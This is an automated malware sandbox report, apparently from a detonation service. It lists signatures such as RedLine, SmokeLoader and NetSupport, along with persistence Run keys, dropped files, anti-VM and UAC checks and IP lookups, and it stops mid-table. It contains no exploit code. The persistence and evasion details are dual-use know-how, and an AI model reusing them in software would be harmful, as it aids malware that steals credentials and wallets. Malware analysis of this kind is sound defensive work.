memory/4396-414-0x0000000005B10000-0x0000000005B11000-memory.dmp
memory/5480-424-0x0000000000000000-mapping.dmp
memory/4396-423-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/4396-428-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/4396-426-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/4396-431-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/5780-439-0x0000000000000000-mapping.dmp
memory/5876-446-0x0000000000000000-mapping.dmp
memory/6052-457-0x0000000000000000-mapping.dmp
memory/5992-454-0x0000000000000000-mapping.dmp
memory/5928-450-0x0000000000000000-mapping.dmp
memory/2104-460-0x0000000004D00000-0x0000000004D01000-memory.dmp
memory/4244-459-0x0000000004920000-0x0000000005246000-memory.dmp
memory/5156-461-0x0000000005010000-0x0000000005011000-memory.dmp
memory/1548-465-0x0000000000000000-mapping.dmp
memory/3508-468-0x0000000000000000-mapping.dmp
memory/5928-485-0x00000000054B0000-0x0000000005AC8000-memory.dmp
memory/2032-484-0x0000000000000000-mapping.dmp
memory/3508-488-0x0000000004490000-0x0000000004491000-memory.dmp
memory/4748-497-0x0000000000000000-mapping.dmp
memory/5528-498-0x0000000000000000-mapping.dmp
memory/2032-506-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5632-504-0x0000000000000000-mapping.dmp
memory/3848-500-0x0000000000000000-mapping.dmp
memory/1548-509-0x0000000004C70000-0x0000000004C71000-memory.dmp
memory/5528-512-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3944-507-0x0000000000000000-mapping.dmp
memory/3944-516-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/5096-519-0x0000000000000000-mapping.dmp
memory/3344-517-0x0000000000000000-mapping.dmp
memory/3944-520-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5748-522-0x0000000000000000-mapping.dmp
memory/3344-526-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/3944-523-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/3944-527-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/3508-531-0x0000000004CF0000-0x0000000004DA7000-memory.dmp
memory/3508-529-0x0000000004B40000-0x0000000004C21000-memory.dmp
memory/6024-530-0x0000000000000000-mapping.dmp
memory/1188-533-0x0000000000400000-0x0000000000414000-memory.dmp
memory/6024-537-0x0000000000400000-0x000000000046D000-memory.dmp
memory/5748-541-0x0000000000400000-0x0000000000414000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
525s
Max time network
1767s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SET84A8.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\drivers\SET84A8.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\7848124.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\GameBox INC\\Faekuxaeshoqy.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DB.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DC.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DA.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DA.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DB.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DC.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d} | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\Faekuxaeshoqy.exe | C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-CAKRT.tmp | C:\Users\Admin\AppData\Local\Temp\is-O6RF9.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-N3SFV.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KC4JP.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-67BOQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-S7TIB.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IVVTP.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-B27BK.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-48MF9.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-3A2B2.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\Q6X63W4DaxWwu8nlhr_IKmLa.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-UE0KN.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-04KDB.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-MLQQG.tmp | C:\Users\Admin\AppData\Local\Temp\is-O6RF9.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-56ABS.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-Q0MNB.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-5OMKP.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\tmp.edb | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-FGODF.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-NLVLI.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-JTILH.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-QBADD.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-EK8EC.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-CREDQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\polstore.dll | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-P2VQM.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-PF3CA.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-CJORO.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-MJBON.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-6P0EE.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-6136Q.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-3L3E6.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\d.jfm | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-PDH86.tmp | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-DQCOM.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-7I26P.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-543FT.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
